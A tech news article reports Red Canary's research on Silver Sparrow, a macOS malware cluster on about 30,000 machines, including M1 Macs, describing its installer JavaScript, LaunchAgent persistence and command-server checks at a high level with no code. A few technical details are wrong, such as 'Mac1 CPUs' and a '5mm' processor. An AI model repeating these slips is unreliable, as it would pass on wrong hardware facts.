Mysterious Silver Sparrow malware hits 30,000 macOS devices

The cluster is among the first to spread malware affecting devices fitted with Apple’s new M1 chip

A close-up shot of a MacBook keyboard

Researchers have identified a novel cluster of macOS-specific malware strains that have infected almost 30,000 Mac endpoints across the world, including machines fitted with Apple’s new M1 CPU.

Dubbed Silver Sparrow, the malware strains use a LaunchAgent to establish their presence on a victim’s machine and uses JavaScript for execution. Most worrying of all is its apparent compatibility with the M1 ARM64 architecture, according to Red Canary researchers who've tracked the cluster’s activities. 

There are two versions of the Silver Sparrow malware that have targeted 29,139 macOS endpoints as of 17 February combined. Infections were discovered across 153 countries but there were high volumes of detection recorded in the UK, US, Canada, France and Germany. 

The difference between these two strains is chiefly that the first only contained a Mach-O binary compiled for Intel architecture while the second included a binary compiled for both Intel and Mac1 CPUs. This makes Silver Sparrow among the first strains detected to target the recently-developed 5mm macOS processor.

The installer packages of both strains use the macOS Installer JavaScript API to execute suspicious commands. This is something normally found in legitimate software and represents the first time Red Canary's researchers have observed this in malware. Malware ordinarily uses pre-install or post-install scripts to execute commands.

Once all the commands are written onto the affected device, there are several scripts that exist on disk. The first script executes immediately following installation to contact a system controlled by the hackers to indicate that installation is complete, while the second executes periodically because of the persistent LaunchAgent to contact the command and control server for more information.

This LaunchAgent provides a means to instruct the macOS initialisation system to periodically execute tasks on an automatic basis. This LaunchAgent tells this system to execute a shell script that downloads a JSON file to disk, converts it into a plist, and uses its properties to determine further actions. 

Every hour, this gets checked for additional instructions and downloadable content, including malicious URLs. Curiously, the researchers haven’t observed a final payload being delivered over the course of more than a week, so they haven’t been able to determine Silver Sparrow’s actual purpose. 

“At the time of publishing, we’ve identified a few unknown factors related to Silver Sparrow that we either don’t have visibility into or simply enough time hasn’t passed to observe,” said Red Canary intelligence analyst Tony Lambert.

“We have no way of knowing with certainty what payload would be distributed by the malware, if a payload has already been delivered and removed, or if the adversary has a future timeline for distribution. Based on data shared with us by Malwarebytes, the nearly 30,000 affected hosts have not downloaded what would be the next or final payload.”

Related Resource

The business guide to ransomware

Everything you need to know to keep your company afloat

Download now

This is in addition to several other mysteries, including how users initially download the file as well as the presence of a file check that removes all persistence mechanisms and scripts. Above all, the Mach-O binary included within the malware only runs if a victim intentionally seeks and launches it, showing messages including “Hello, World!” and “You did it!”, suggesting this threat is perhaps under development in a proof-of-concept stage. 

Red Canary doesn’t have an accurate picture of when Silver Sparrow first emerged, but through its investigations determined that it perhaps first arose in August 2020, with the M1 version springing up for the first time in September.

Featured Resources

How to scale your organisation in the cloud

How to overcome common scaling challenges and choose the right scalable cloud service

Download now

The people factor: A critical ingredient for intelligent communications

How to improve communication within your business

Download now

Future of video conferencing

Optimising video conferencing features to achieve business goals

Download now

Improving cyber security for remote working

13 recommendations for security from any location

Download now

Recommended

MacBook users warned against EvilQuest ransomware
ransomware

MacBook users warned against EvilQuest ransomware

19 Feb 2021
Agent Tesla malware evades security controls to infect systems
malware

Agent Tesla malware evades security controls to infect systems

3 Feb 2021
Your essential guide to internet security
Security

Your essential guide to internet security

27 Jan 2021
Android malware vendor teams with marketer to promote new malware
malware

Android malware vendor teams with marketer to promote new malware

11 Jan 2021

Most Popular

How to connect one, two or more monitors to your laptop
Laptops

How to connect one, two or more monitors to your laptop

25 Feb 2021
How to find RAM speed, size and type
Laptops

How to find RAM speed, size and type

26 Feb 2021
Ransomware operators are exploiting VMware ESXi flaws
ransomware

Ransomware operators are exploiting VMware ESXi flaws

1 Mar 2021